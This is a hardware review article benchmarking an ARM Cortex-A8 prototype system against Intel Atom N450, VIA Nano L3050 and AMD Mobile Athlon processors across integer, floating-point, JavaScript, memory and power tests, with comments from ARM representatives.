Inside desktops , notebooks , servers and now even reaching into mainframes and supercomputers , the x86 family of microprocessors has mercilessly driven all competitors to extinction .
The “ x86 ” moniker refers to the descendents of the 16 - bit Intel 8086 .
Its 8 - bit little brother , the Intel 8088 , was the chip that powered the first IBM PC back in August , 1981 .
Shockingly primitive by today ’s standards , the 8088 spoke a computer dialect that is still understood by the most modern , powerful and successful CPUs from Intel , AMD and VIA .
The roll call of those vanquished by the x86 family include microprocessors from IBM , DEC , Motorola , HP , Sun , Silicon Graphics , Commodore and even rivals from within Intel itself .
Resistance has been futile .
Eventually , even persistent holdout Apple succumbed to the relentless performance advances of the x86 juggernaut , dumping IBM ’s Power architecture for the safety and reliability of x86 microprocessor advancements .
Almost like clockwork , x86 CPUs double in capability every 18 months while prices continue to slowly decline .
Yet , almost silently , a stealthy opponent has built up forces within the modest confines of PDAs , calculators , routers , media players , printers , GPS units and a plethora of other embedded devices but most notably mobile phones .
Based in Cambridge , England , ARM Holdings dominates 32 - bit microprocessor sales despite its very low profile .
While AMD , a microprocessor vendor that commands about one - fifth of the x86 market , celebrated the sale of their 500 - millionth CPU last July in their 40th year of operation , there were nearly three billion ARM chips shipped in 2009 alone .
The history of ARM microprocessors is almost as long as that for x86 CPUs .
Sometimes called the “ British Apple , ” Acorn Computers began in 1978 and created a number of PCs that were very successful in the United Kingdom including the Acorn Electron , the Acorn Archimedes and the computer that dominated the British educational market for many years , the BBC Micro .
As the Commodore produced , 2 MHz MOS Tech 6502 microprocessor that powered the BBC Micro grew long - in - the - tooth ; Acorn realized it needed new chip architecture to compete in business markets against the IBM PC .
Inspired by the Berkeley RISC project which demonstrated that a lean , competitive , 32 - bit processor design could be produced by a handful of engineers , Acorn decided to design its own RISC CPU sharing some of the most desirable attributes of the simple MOS Tech 6502 .
Officially begun in October , 1983 , the Acorn RISC Machine project resulted in first silicon on April 26 , 1985 .
Known as the ARM1 , the chip worked on this first attempt .
The first production model , the ARM2 , shipped only a year later .
In 1990 , Acorn spun off its CPU design team in a joint venture with Apple and VLSI under a new company named Advanced RISC Machines Ltd , which is now an alternative expansion of the original “ ARM ” acronym .
While Acorn Computers effectively folded over ten years ago , its progeny , ARM Holdings is stronger than ever and dominates the market for mobile phone microprocessors .
Contrary to x86 chipmakers Intel , AMD and VIA , ARM Ltd does not sell CPUs , but rather licenses its processor designs to other companies .
These companies include NVIDIA , IBM , Texas Instruments , Intel , Nintendo , Samsung , Freescale , Qualcomm and VIA Technologies .
Late last year , AMD spin - off GlobalFoundries announced a partnership with ARM to produce more advanced 28 - nanometer versions of ARM - based system - on - chip designs .
The ARM Cortex - A8 versus x86
Like the Intel Atom , the ARM Cortex - A8 is a superscalar , in - order design .
In other words , the Cortex - A8 is able to execute multiple instructions – in the case of the Atom , up to two – during each clock tick , but can only execute instructions in the order they arrive , unlike the VIA Nano and all current AMD and Intel chips beside Atom .
The Nano , for instance , can shuffle instructions around and execute them out - of - order to improve processing efficiency by about 20 - 30 % beyond superscalar in - order chips .
The immediate predecessor of the Cortex - A8 is the ARM11 which found a home in the original Apple iPhone and countless other smartphones .
The ARM11 is a simple , scalar , in - order microprocessor , so the best it can ever do is execute one instruction per clock cycle .
As the Cortex - A8 is roughly equivalent to the Intel Atom , the ARM11 is somewhat similar to the VIA C7 .
In - order chips suffer a performance hit because processing can come to a screeching halt when an instruction is encountered that takes a long time to complete .
On the other hand , out - of - order chips can shuffle instructions around so that forward progress can usually be made while a lengthy instruction is simultaneously processed .
The Intel Atom manages to partially overcome this problem by implementing Hyper - Threading , Intel ’s brand name for its version of symmetric multithreading [ SMT ] .
Like a few other Intel CPUs [ and the three IBM PowerPC - based cores in the Xbox 360 ’s Xenon ] , the operating system [ OS ] views the Atom as if it has more processing cores than it actually does .
In the case of the single core Atom N450 , the OS sees two “ virtual ” cores .
The operating system will accordingly distribute a thread [ independently running task or program ] to each core at once .
Consequently , the Atom often churns through two unrelated instruction streams simultaneously , so even if one gets blocked by a slow , “ high latency ” instruction , the other thread can usually still be processed .
While Hyper - Threading does n’t help much on single threaded tasks – and a vast amount of modern computing remains single - threaded – Hyper - Threading helps a great deal with slow input / output [ I / O ] intensive instruction streams since I/ O operations can take an eternity from the CPU ’s vantage point and can block even an out - of - order core .
For instance , the Atom boots Windows 7 relatively quickly compared with even superscalar , out - of - order , single - core chips like the VIA Nano because the Atom can continue processing a second thread and does not have to frequently stop and wait on the vast number of I/O operations encountered during boot - up .
Intel chose to equip the Atom with Hyper - Threading instead of making the chip out - of - order because Hyper - Threading is simpler and consumes less power .
Intel ’s Austin design team created the Atom especially for low - power environments .
However , the benefits of Hyper - Threading diminish when multiple cores are available .
The newer ARM Cortex - A9 MPCore is designed to be deployed in two or more cores , so SMT is not as important under multi-core conditions .
For instance , the new NVIDIA Tegra 2 boasts two ARM Cortex - A9 processors .
Moreover , the A9 is superscalar , and out - of - order with speculative execution , putting it on equal footing with the newer x86 chips , at least superficially .
Keep in mind that modern x86 microprocessors tend to be very rich in execution units and , after decades of development , are extremely refined in terms of low instruction latencies and feature sets .
Perhaps most importantly , the supporting x86 “ ecosystems ” are unmatched .
“ Ecosystem ” is the current buzzword that refers to the surrounding chip set , memory , I/O , interconnect and peripheral infrastructure .
Moreover , ARM chips are RISC cores which have reduced instruction sets .
In fact , RISC is an acronym for “ Reduced Instruction Set Computer ” and ARM CPUs typify this genre in many ways .
In general , RISC chips are leaner and usually support fewer instructions than CISC or “ Complex Instruction Set Computer ” microprocessors .
While today ’s x86 CPUs wield a decidedly CISC - style instruction set , the underlying hardware has absorbed most of the advantages of RISC while implementing many complex instructions in microcode .
For instance , the VIA C3 bolted a CISC x86 frontend over a very MIPS - like RISC core .
An issue to watch out for when comparing ARM CPUs against x86 microprocessors is the size of binary files .
In the past , RISC machines have produced larger executables because more instructions are often necessary than with CISC - derived systems .
If binary sizes differ significantly , this places greater pressure on cache sizes , RAM size and memory bandwidth .
With today ’s terabyte - scale mass storage devices , increased binary bloat is not significant since the vast majority of drive space is consumed by video and other multimedia data .
Binary size comparison ARM x86 STREAM 112.3 % 100.0 % miniBench 115.1 % 100.0 % CoreMark 107.3 % 100.0 %
The table above shows that ARM Cortex binaries are indeed larger than x86 binaries , but the difference is only about 10 - 15 percent .
If this sampling is representative for both platforms , binary size differences will rarely matter .
ARM L1i and L2 caches should minimally be as large as those found on x86 microprocessors , but that is not currently the case , as will be discussed shortly .
ARM representatives responded with the following :
“ The binary size of the ARM benchmarks is significantly lowered with the Thumb - 2 hybrid instruction set .
Expected results are 20 - 30 % lower code size at equivalent or better performance .
The 10.0 x version of Ubuntu Linux has been optimized for Thumb - 2 . ” [ The version as tested was Ubuntu 9.04 , Ed . ]
Of course , the real story in the battle between ARM and x86 is how they measure up against each other in the performance arena .
In this report , we ’ll take a close look at competitive performance across a broad range of tests and also take a peek at power usage .
Benchmarking considerations
Normally it is a primary prerequisite to insure that all systems under test have been configured identically prior to benchmarking .
Unfortunately , this is impossible to achieve in this report given the highly integrated nature and grossly dissimilar “ ecosystems ” of ARM versus x86 microprocessors .
For instance , the Freescale i.MX515 system that we used in our tests only supports DDR2 - 200 32 - bit memory , much slower than the VIA Nano L3050 system ’s DDR2 - 800 64 - bit memory .
Worse , the i.MX515 ’s integrated video solution is far more limited , maxing out at 1024×768 at 16 - bit color depth , than the graphics solutions on any of the x86 systems .
Given this rigidly set , unlevel playing field , we deployed a battery of benchmarks that run primarily within the CPU ’s caches .
In other words , we made an attempt to only measure CPU - bound performance .
We verified the CPU sensitivity of each test by increasing the clock speed of the VIA Nano from 800MHz to 1800MHz .
Tests should scale closely to the clock speed ratio of 225 percent .
Benchmark scaling Hardinfo 226 % Peacekeeper 209 % Google V8 272 % SunSpider 228 % miniBench 220 % CoreMark 225 % stream add 108 %
As shown in the table above , all of the benchmarks scaled appropriately with the exception of Google V8 and Stream Add , a memory bandwidth test that is constrained by memory performance and is included here as a counter example .
Benchmarks that scale superlinearly [ superlinear : to increase at a rate greater than can be described with a straight line ] like Google V8 usually are not good benchmarks .
Indeed , Google V8 also demonstrated very large run -to - run variations on several tests like EarlyBoyer and RegExp .
Nevertheless , we have included full Google V8 results since it remains a popular JavaScript benchmark .
Speaking of run - to - run variation , we ran each test at least three times and calculated the coefficient of variation [ CV ] to insure result validity .
For this report , we placed four CPUs under test : the 800MHz Freescale i.MX515 which is based upon the ARM Cortex - A8 , the new VIA Nano L3050 downclocked to 800MHz , the new Intel Pineview - based Atom N450 downclocked to 1GHz and , for historical perspective , an 800MHz Mobile Athlon [ Barton core ] .
Unfortunately , it was impossible to downclock the 1.67GHz Atom N450 below 1GHz , but , as you will see , the results we obtained are still very interesting .
The Atom N450 introduces an on - die GPU which significantly reduces overall platform power consumption compared with the older Silverthorne - based Atom platforms .
I purchased a Gateway LT2104u netbook from Best Buy for this report in order to test the Intel Atom N450 .
The Gateway is a very well executed netbook design with a solid feel , attractive appearance , excellent battery life and good feature set .
The VIA Nano L3050 is the new , second generation , “ CNB ” Nano that boosts performance from 20 - 30 percent beyond the original “ CNA ” Nano , while also reducing power demands by similar amounts .
The CNB - based Nano is still based upon the same 65nm Fujitsu process leveraged with the original CNA - based VIA Nano .
Despite these improvements , the CNB Nano die - size is almost identical to its predecessor ’s at around 62 - 64 square millimeters .
The table below summarizes relevant system details .
Freescale i.MX515 [ ARM Cortex - A8 ] Mobile Athlon [ Barton ] VIA Nano L3050 Intel Atom N450 L1i 32 kB 64 kB 64 kB 32 kB L1d 32 kB 64 kB 64 kB 24 kB L2 256 kB 512 kB 1,024 kB 512 kB frequency 800 MHz 800 MHz 800 MHz 1,000 MHz memory speed DDR2 - 200 MHz [ 32 - bit ] DDR - 800 MHz DDR2 - 800 MHz DDR2 - 667 MHz operating system Ubuntu 9.04 Ubuntu 9.04 Ubuntu 9.04 Jolicloud [ Ubuntu 9.04 ] gcc 4.3.3 4.3.3 4.3.3 4.3.3 Firefox 3.5.7 3.5.7 3.5.7 3.5.7
All systems ran Ubuntu Linux Version 9.04 with the exception of the Atom netbook where we had to install Jolicloud Linux because of video driver issues .
However , Jolicloud is based upon Ubuntu 9.04 , so programs installed from the Ubuntu repositories were identical .
We chose Ubuntu 9.04 because the ARM - based Pegatron nettop we used in this report came with Ubuntu 9.04 preinstalled .
An attempt to upgrade that box to the latest version of Ubuntu failed due to insufficient disk space .
The Pegatron device was equipped with a 4GB flash drive .
Equalizing benchmarking terms – How to downclock Intel Atom N450 in Linux OS
We underclocked the 1.8GHz VIA Nano L3050 to 800MHz by using the CPU multiplier setting in the Centaur reference system ’s BIOS .
We verified the proper clock speed by reading MSR 0x198 .
For the Atom N450 Gateway netbook , we underclocked the Atom to 1GHz using the Gnome CPU Frequency Monitor taskbar applet .
This handy applet unfortunately does not support the VIA Nano yet .
For JavaScript tests , all systems ran Firefox version 3.5.7 .
It is very important to use the same browser version for JavaScript tests because performance can vary tremendously from browser to browser or even version to version of the same browser .
We thank C.J. Holthaus and Glenn Henry from Centaur Technology for the VIA Nano L3050 reference board , and Katie Traut and Phillipe Robin from ARM for the tiny , Ubuntu based Freescale i.MX515 - based Pegatron prototype system .
The Pegatron “ nettop ” is only slightly larger than a CD case yet it boasts a full complement of features including 512MB of DDR2 - 200MHz memory [ 32 - bit interface ] , a VGA connector , Wireless “ N ” networking , Bluetooth 2.1 + EDR , a flash memory card reader , and audio , headphone , Ethernet and USB ports .
Total system power usage rarely rises much above 6 Watts .
ARM Cortex - A8 - based Pegratron - built system for current and future development for ARM platform .
Unless specified otherwise , all benchmark results are reported so that larger numbers correspond to better performance .
Many tests have been “ normalized ” against the ARM Cortex - A8 so that results are reported in terms of the performance ratio with the Cortex - A8 .
For instance , if the Atom is twice as fast at the Cortex - A8 on a certain test , it will score 2.00 .
A gander at memory subsystem performance
As mentioned earlier , the memory subsystems vary significantly among these dissimilarly configured systems .
The ARM Cortex - A8 struggles with it very weak DDR2 - 200MHz , 32 - bit memory .
Nevertheless , memory bandwidth results are important because they underscore a handicap that ARM must eventually address .
ARM systems have typically been optimized for extreme low - power environments while x86 systems have been aggressively optimized for performance .
A sacrifice made in the Freescale i.MX515 is memory speed exchanged for low power usage , but this absolutely destroys performance on many types of tasks as exemplified by our STREAM results .
As can be seen in the graph above , the ARM Cortex - A8 as part of the Freescale i.MX515 struggles against even the ancient AMD Athlon and is creamed by the VIA Nano and the Intel Atom .
While part of the problem is its pokey memory , another component is the ARM chip ’s meager 32 - bit memory interface , half the width used for single - channel memory access by x86 chips .
If the Cortex - A8 were equipped to access DDR2 - 800 memory through a 64 - bit interface , it might very well keep up with its x86 rivals in terms of memory bandwidth .
For this report , ARM representatives explained the design decisions behind the Freescale i.MX515 used in our Pegatron prototype :
“ The ARM ecosystem is centered on a “ right - sized ” computing philosophy .
ARM Partners design their SoCs to a particular set of applications , enabling the best tradeoff for power , cost and performance for a given application .
The Freescale i.MX51 was designed for a particular application class , with the memory subsystem designed for the needs of these applications .
It is understandable that the performance of this memory subsystem will be different from platforms targeted at general purpose computing applications . ”
Incidentally , the VIA Nano can also be configured to support 32 - bit memory access .
This is desirable in severely space constrained environments where trace and pin counts adversely impact package and PCB implementation size .
Integer Performance
Although it might not always appear to be the case , all computing is the processing of numbers .
From the words of a love letter , to the glistening dew drops on a rose , to Johnny Cash ’s rumbling , anguished , repentant voice , to Gordon Freeman ’s apocalyptic universe , to the ruby slippers on Dorothy ’s feet , all are simply numbers to a computer .
For most chores , the only numbers that matter are integers .
Integers are the natural counting numbers like 1 , 2 , 3 and their negative counterparts plus zero .
With the exclusion of 3D gaming and some types of video and still image rendering , encoding and manipulation , the vast bulk of day - to - day computing is integer - based .
The integer test results we look at here can give us insight into typical system performance across chores like word processing and web browsing .
The Embedded Microprocessor Benchmark Consortium [ EEMBC ] recently released a benchmark that is freely available to anyone .
Dubbed “ CoreMark , ” this test provides a quick way to compare CPU performance across entirely different processor architectures .
We compiled CoreMark on each platform using GCC version 4.3.3 and the following flags :
- O3 -DMULTITHREAD=4 - DUSE_FORK=1 - DPERFORMANCE_RUN=1
-lrt
We chose to generate four threads to insure scaling across a variety of systems featuring multiple cores and / or Hyper - Threading like the Intel Atom .
As you can see from the graph above , the ARM Cortex - A8 is very competitive on EEMBC CoreMark , running almost as fast as the Athlon and Nano .
The Atom pulled ahead thanks to Hyper - Threading combined with its 25 percent clock speed advantage over the other chips .
Unfortunately , there are n’t many more overall wins for the Atom ahead ; please note , however , that most of the remaining tests are single - threaded .
“ miniBench ” is a diverse benchmark that I ’ve been working on for several years .
It ’s part of my OpenSourceMark benchmarking project .
miniBench contains a wide variety of popular tests and runs quickly from the command - line .
I also have a GUI - based version that I wanted to use for this report but could not do so because the Qt tool chain would not install completely on the ARM system .
Instead , I used the excellent and relatively lightweight Code : : Blocks IDE to create and manage the necessary C++ project files for a command - line binary .
You can download the x86 Code : : Blocks project here .
An x86 Linux binary compiled with static libraries is here .
A similar ARM Cortex - A8 Linux binary is here .
Both the x86 Linux project and the ARM Cortex - A8 project will eventually be uploaded to the OpenSourceMark SourceForge page , along with GUI adaptations of these benchmarks .
The ARM Cortex - A8 struggles on three of the five tests in this first miniBench chart .
Heap
Sort is the worst result for the A8 and this is almost certainly because the test appears to be significantly impacted by memory bandwidth .
The i.MX515 system is saddled with very poor bandwidth as already demonstrated in this report .
Integer Matrix Multiplication is another memory bandwidth sensitive test where the ARM chip comes up short .
However , the ARM Cortex - A8 is extremely impressive on the Integer Arithmetic test , blowing away the Athlon and doubling the Atom ’s performance .
The Integer Arithmetic test does exactly what you ’d expect it to do : it performs a large number of very simple integer arithmetic calculations .
Also notice that the 800MHz ARM Cortex - A8 beats the 1GHz Intel Atom N450 on the ubiquitous Dhrystone benchmark despite the fact that the ARM chip spots the Atom a 25 percent clock speed advantage .
ARM advertises that we should be able to get 1,600 Dhrystone MIPS from an 800MHz Cortex - A8 .
On our tests , the 800MHz ARM Cortex - A8 achieved 1,680 Dhrystone MIPS .
It ’s clear that the ARM Cortex - A8 is aggressively optimized for Dhrystone performance , a fact borne out by the fact that ARM touts the chip ’s Dhrystone throughput .
On the second set of miniBench integer tests , the ARM Cortex - A8 holds its own against the brawnier x86 CPUs .
The ARM Cortex - A8 even beat the VIA Nano L3050 on the Sieve test .
More remarkably , the Cortex - A8 is very close to parity with the Atom across all of these tests , save for one , if the Atom ’s 25 percent clock speed advantage is considered .
Notice , though , that the ARM chip could not run the String Concatenation test .
This is an important indication of the relatively immature state of ARM ’s Linux / GNU software support .
Ubuntu as a whole was often flakey .
Doubtlessly , this will improve with time .
The VIA Nano L3050 obliterates all of the competition on the hashing tests because the Nano features hardware support for these important security functions .
However , the 800MHz ARM Cortex - A8 is amazingly good at hashing and thoroughly beats the 1GHz Atom on both tests and is only slightly slower than the Athlon .
The VIA Nano L3050 enjoys its biggest triumph on the miniBench cryptography tests because the Nano is equipped with robust hardware support for AES ECB encryption and decryption .
Again , the ARM Cortex - A8 remains very close to the Intel Atom if the Atom ’s 25 percent clock speed advantage is considered .
HardInfo is one of the few CPU benchmarks available from within Ubuntu ’s repositories .
The ARM Cortex - A8 does n’t perform quite as well on HardInfo as it did on miniBench , possibly because I used very aggressive optimization flags for both platforms when compiling miniBench .
Nevertheless , the ARM Cortex - A8 stays within spitting distance of the x86 CPUs except on the FPU Ray - tracing test which is not an integer test but rather a floating - point test .
Floating - Point performance
Gaming , scientific computing , certain spreadsheets like financial simulations and some image and video manipulation tasks involve fractional and irrational numbers .
Called “ floating - point ” because the decimal or radix point can float around among the significant digits of a number , floating - point performance has become increasingly important in modern computing .
However , good floating - point performance is relatively hard to engineer and requires a substantial number of additional transistors .
Of course , this drives up power usage .
Typically , floating - point intensive operations consume more power than pure integer tasks .
In fact , miniBench ’s Linpack test was the worst case power consumer on the VIA Nano .
Centaur discovered this while I worked there as head of benchmarking .
However , this does not include “ thermal virus ” programs like the absolute worst case program developed by Glenn Henry , Centaur ’s president .
Integrated floating - point [ FP ] hardware is a fairly new addition to ARM processors and even though the Freescale i.MX515 ARM Cortex - A8 features two dedicated floating - point units , there are still severe limitations .
The faster of the two FP units is the “ Neon ” SIMD engine , but it only supports 32 - bit single - precision [ SP ] numbers .
Single - precision numbers are too imprecise for many types of calculations .
Hardware support for 64 - bit , double - precision , floating - point calculations is provided by the “ Vector Floating - Point ” [ VFP ] unit , a pretty weak coprocessor .
And despite being called a “ vector ” unit , the VFP can only really operate on scalar data [ one at a time ] , although it does support SIMD instructions which helps improve code density .
Oddly enough , during our performance optimization experiments , Neon generated the same level of double - precision performance as the VFP , while doubling the VFP ’s single - precision performance .
When we asked ARM about this , company representatives replied , “ NEON improves FP performance significantly .
The compiler should be directed to use NEON over the VFP . ”
We therefore compiled miniBench to leverage Neon for this report .
Note that while the Neon compiler flag was used for the ARM chip , none of the tests are explicitly SIMD optimized – the x86 version of miniBench used in this report does not include hand - coded SSE or SSE2 routines and the ARM Cortex - A8 version of miniBench does not include similar Neon code .
In the miniBench MFLOPS tests , the ARM Cortex - A8 looks pretty bad except on division .
While the VIA Nano has the best DP [ double - precision ] performance , note how well the Intel Atom N450 handles SP calculations .
It is also worthwhile to recognize the very good floating - point division performance of the ARM Cortex - A8 ’s Neon .
Unlike all of the x86 chips that I have ever tested , the Cortex - A8 delivers identical throughput for both floating - point division and multiplication .
Division is much slower on x86 processors than multiplication .
Consequently , the Cortex - A8 keeps up very well with the x86 CPUs in this report on DP division , more than doubling the Atom ’s performance when the Atom ’s clock speed advantage is considered .
In single - precision division , the ARM Cortex - A8 beats ALL of the x86 microprocessors it ’s pitted against here .
The ARM Cortex - A8 continues to languish on the remaining miniBench floating - point tests with two notable exceptions .
The Cortex - A8 is fairly strong on FFT calculations , an extraordinarily important algorithm for many , many tasks .
The ARM chip is also competitive with the Atom on the Double Arithmetic test .
Observe how the old Barton - core Mobile Athlon demolishes all of the other chips on Trig.
AMD has historically provided industry leading performance on transcendental calculations , while the same area has always been a big weakness for VIA ’s CPUs .
ARM really needs to bolster their chips ’ performance on transcendental operations like the trigonometry functions exercised in this test .
The takeaway from this section is that the ARM Cortex - A8 does not deliver acceptable floating - point performance for netbooks , notebooks or desktops compared with x86 CPUs .
This is an area ARM must address if the company plans to compete toe - to - toe with x86 microprocessors .
JavaScript performance
JavaScript performance has become very important as cloud - based computing has finally begun to take hold with the appearance of solutions like Google Apps , Zoho Office , Adobe ’s Acrobat.com , Aviary and many more applications .
The Google Android operating system largely foregoes native applications and leverages Web - based JavaScript programs .
Jolicloud Linux takes a similar but less aggressive tack allowing native and cloud - based applications to seamlessly co-exist .
There are several widely used JavaScript tests that run across all of the CPUs examined in this report .
However , it is very important to run these tests on the same browser across all platforms .
Even specific browser version is also very important because JavaScript performance varies wildly from browser to browser and version to version as web browser developers push each other in a mad race to provide the fastest JavaScript engines .
Thankfully , Firefox 3.5.x is available for each system included in this report and we used it for these tests .
FutureMark Corporation , the maker of PCMark and 3DMark , has introduced its own JavaScript benchmark called Peacekeeper .
FutureMark Peacekeeper is hands down the most elaborate JavaScript benchmark currently available , although it is difficult to assess its validity .
PeaceKeeper is the only JavaScript test in our roundup that had complex graphical components .
The Freescale i.MX515 ARM system fared poorly against its x86 rivals across all Peacekeeper tests .
This might be partially accountable to the slow main memory subsystem which saddled Cortex - A8 .
The i.MX515 Cortex - A8 only has 256kB of L2 cache compared to 512kB for the Athlon and the Atom and 1,024 kB for the Nano , so it is much easier for a benchmark to spill out of the Cortex - A8 ’s L2 cache and into its extremely slow main memory .
ARM representatives agreed that the Cortex - A8 ’s poor showing on FutureMark Peacekeeper is most likely due its L2 handicap , perhaps making Peacekeeper , in the context of this report , more of a comparison of memory subsystems , not processors .
Note also that the ARM system failed to complete the Peacekeeper complex graphics test .
The VIA Nano L3050 was the clear winner of FutureMark ’s PeaceKeeper , besting all of its rivals on every test .
Even though the Intel Atom N450 was far behind the two other x86 chips , its overall score was nearly twice that of the ARM system .
Again , keep in mind that the Atom also ran with a 25 percent clock speed advantage over the other chips in this comparison .
Also be aware that JavaScript is not threaded , so the Atom ’s Hyper - Threading engine wo n’t help it much on JavaScript tests .
With Google in the lead of cloud - based computing efforts , it should not be surprising that the search engine giant also provides its own JavaScript benchmark .
Unfortunately , the Google V8 benchmark does not behave like a very good benchmark at this point , demonstrating large run -to - run variation and superlinear scaling .
Nevertheless , Google V8 is a popular JavaScript benchmark , so we included it here .
The Google V8 benchmark closely reproduced FutureMark Peacekeeper ’s results .
VIA ’s Nano L3050 won every test by significant margins again .
The Atom trailed the other x86 processors badly , but still nearly doubled the ARM Cortex - A8 ’s showing .
Our final JavaScript benchmark is SunSpider , perhaps the most popular JavaScript test in use today .
Again , the ARM Cortex - A8 does not look good , faring only slightly better than on the other two JavaScript benchmarks .
The VIA Nano L3050 barely pulls out an overall win , its score hurt by very poor performance on bit level operations .
The ARM Cortex - A8 beats the Nano on two of these tests .
Despite its age , the AMD Mobile Athlon based on the Barton core has delivered competitive performance across nearly all tests .
I must state at this point that the JavaScript results do seem to reflect the relative , subjective , overall feel of the four systems .
Despite its strong showing on many integer tests , the Freescale i.MX515 - based Pegatron system feels much more sluggish than all three of the x86 systems ; the Pegatron ’s extremely slow memory subsystem doubtlessly contributes to this issue .
The Atom N450 is also clearly more lethargic than either the AMD Mobile Athlon or the VIA Nano L3050 systems .
The AMD and VIA systems are essentially indistinguishable during normal usage .
2D graphics performance
Take the following chart with a grain of salt because the video subsystems across the three systems are very dissimilar .
The VIA , Intel and Freescale systems all used integrated graphics while the AMD system was equipped with a discrete NVIDIA NX6200 AGP card .
Even though the three x86 systems ran at 24 - bit color depth , they were all two to three times faster than the ARM system that ran at only 16 - bit color depth .
We tested all systems at 1024 ×768 [ XGA ] resolution except the Atom , which we tested at the native panel resolution of 1024×600 .
Power consumption
While the x86 microprocessors in this comparison enjoy a clear overall performance advantage , ARM CPUs are renowned for their power usage thriftiness .
It is very difficult to compare power usage among the four CPUs under test for this report .
The AMD and VIA systems are inappropriate for power comparisons because they are based on desktop hardware .
The chart below contrasts power consumption between the Intel Atom N450 and the ARM Cortex - A8 while running miniBench .
The power curves were generated from system power usage adjusted downwards so that idle system power was discarded .
For the Atom , idle power was 13.7W with the Gateway netbook ’s integrated panel disabled while the idle power for the Pegatron system was only 5.4W .
Be aware that the Pegatron prototype does not implement many power management features .
ARM representatives note :
“ The Pegatron development board was designed as a software development tool and does not have a commercial production software build so it does not have many of the power management features found in ARM - based mobile devices .
Production systems would expect to have aggressive power management implemented , lowering the ARM power consumption . ”
Given this information , the results we show here likely represent an energy consumption condition considerably worse than would be encountered with a similarly configured , commercial , ARM Cortex - A8 - based system .
Subtracting idle power usage should isolate the curves to the power necessary for running miniBench .
Note that the Atom reached minimum power usage shortly after startup and never reached that level again .
Idle power beyond that point is about 1 Watt higher .
Even taking that into consideration , the Atom consumes at least three times the power of the ARM Cortex A8 on the same tests .
It ’s particularly interesting to see how power usage compares on the AES tests where both CPUs deliver comparable performance .
The first major hump on the Atom curve shows the power consumed on the AES tests .
Compared with the ARM Cortex - A8 , the Intel Atom N450 required about four times more power while delivering only about 30 percent additional performance – and all this is with a 25 percent clock speed advantage .
The sharp peak in Atom power usage occurred on the miniBench floating - point memory bandwidth tests .
The Atom completes miniBench in about one - half the time needed by the ARM Cortex - A8 due to the ARM processor ’s very poor floating - point performance .
The first major dips in both curves [ at 1000s and 2000s ] indicate where the two systems complete the benchmark .
Even though floating - point hardware can draw a lot of power , FP units usually deliver significant energy savings because floating - point operations take much less time to complete with accelerated hardware support .
Energy consumed for a task is : E = P * t , where “ E ” is for “ Energy , ” “ P ” is for “ Power ” and “ t ” is for “ time . ”
Good floating point hardware might drive up power demands , but the time to complete FP operations is reduced enough to dramatically reduce the total energy needed for those operations .
Despite the fact that the ARM Cortex - A8 blows away the Intel Atom in power thriftiness , do n’t belittle the Atom .
It is a resounding success in terms of reducing the power demands of x86 microprocessors .
The Intel Atom is currently the only realistic x86 system - on - chip [ SoC ] design ready to migrate downwards into smartphones .
Doubtlessly inspired by the VIA C7 – which explains why Intel set up shop in Austin , the same town where VIA ’s Centaur design team is headquartered [ in fact , a few ex -“ Centaurians ” worked on the Atom ] – the Intel Atom delivers acceptable performance while sipping power at levels far lower than usually seen in the x86 world .
Right now , there is no competing , low - power x86 CPU – let alone SoC – that can match the Atom in terms of performance per Watt , especially on multi- threaded applications .
Conclusion
The ARM Cortex - A8 achieves surprisingly competitive performance across many integer - based benchmarks while consuming power at levels far below the most energy miserly x86 CPU , the Intel Atom .
In fact , the ARM Cortex - A8 matched or even beat the Intel Atom N450 across a significant number of our integer - based tests , especially when compensating for the Atom ’s 25 percent clock speed advantage .
However , the ARM Cortex - A8 sample that we tested in the form of the Freescale i.MX515 lived in an ecosystem that was not competitive with the x86 rivals in this comparison .
The video subsystem is very limited .
Memory support is a very slow 32 - bit , DDR2 - 200MHz .
Languishing across all of the JavaScript benchmarks , the ARM Cortex - A8 was only one - third to one - half as fast as the x86 competition .
However , this might partially be a result of the very slow memory subsystem that burdened the ARM core .
More troubling is the unacceptably poor double - precision floating - point throughput of the ARM Cortex - A8 .
While floating - point performance is n’t important to all tasks and is certainly not as important as integer performance , it cannot be ignored if ARM wants its products to successfully migrate upwards into traditional x86 - dominated market spaces .
However , new ARM - based products like the NVIDIA Tegra 2 address many of the performance deficiencies of the Freescale i.MX515 .
Incorporating two ARM Cortex - A9 cores [ more specifically , two ARM Cortex - A9 MPCore processors ] , a vastly more powerful GPU and support for DDR2 - 667 [ although still constrained to 32 - bit access ] , the Tegra 2 will doubtlessly prove to be highly performance competitive with the Intel Atom , at least on integer - based tests .
Regarding the Cortex - A8 ’s biggest weakness , ARM representatives told us its successor , the Cortex - A9 , “ has substantially improved floating - point performance . ”
NVIDIA ’s CUDA will eventually also help boost floating - point processing speed on certain chores .
Unmatched software support has always been the “ ace in the hole ” for the x86 contingent .
However , with the success of Linux and the maturity of its underlying and critical GNU development toolset , Linux / GNU support could be the great equalizer that allows ARM to finally overcome the x86 stranglehold in netbooks and even notebooks and desktops .
Maturing Linux support might also assist ARM chips to make further incursions into gaming devices .
I did n’t expect it , but the emerging war between ARM and x86 microprocessors is turning out to be much more competitive and interesting than I ever imagined .
In addition to the main ARM versus x86 focus of this report , there is also a subplot pitting the new Intel Atom N450 against the new VIA Nano L3050 .
The Intel Atom N450 is a remarkable product in that it is the first x86 SoC [ system - on - chip ] that is suitable for smartphones and other ultra- low power environments .
As such , the Atom promises to dramatically improve the sophistication and performance levels of those market spaces .
While the various Atom models currently dominate the booming netbook market , it is evident from our JavaScript tests that the VIA Nano L3050 is much more desirable if JavaScript performance is important at all .
Across our JavaScript benchmark results , the 800MHz VIA Nano L3050 is about 50 percent faster than the 1GHz Intel Atom N450 .
However , VIA still lags Intel in terms of suitability for low power consumption environments , largely because Intel leverages its outstanding 45nm fabrication technologies with the Atom , while VIA still produces the Nano L3050 in the relatively elderly 65nm Fujitisu process node .
The Atom is also strong on multithreaded tasks as demonstrated by its CoreMark victory .
Hyper -Threading will also benefit Atom in I/O intensive environments where the single - core Nano will be hard - pressed to keep up .
Lastly , the AMD Mobile Athlon in this comparison gives us important insight into how the new chips from Intel , VIA and ARM stack up historically .
Overall , across all of our performance tests , the ancient Barton core - based Athlon came in a very close second behind the VIA Nano L3050 .
This suggests AMD could easily produce a competitive low power CPU if the chipmaker did nothing else but shrink one of its older core designs while adding a few power saving tweaks .
In summary , ARM is positioned very well to engage in battles with the Intel Atom as that x86 chip advances into smartphones .
The ARM Cortex - A8 appears to use much less power than the Atom , while often delivering comparable integer performance .
Nevertheless , the Atom is significantly faster overall when considering holistic system performance , but that performance will be accompanied with a battery life penalty and significantly more heat production .
Heat is a serious problem within the tight confines of mobile phones .
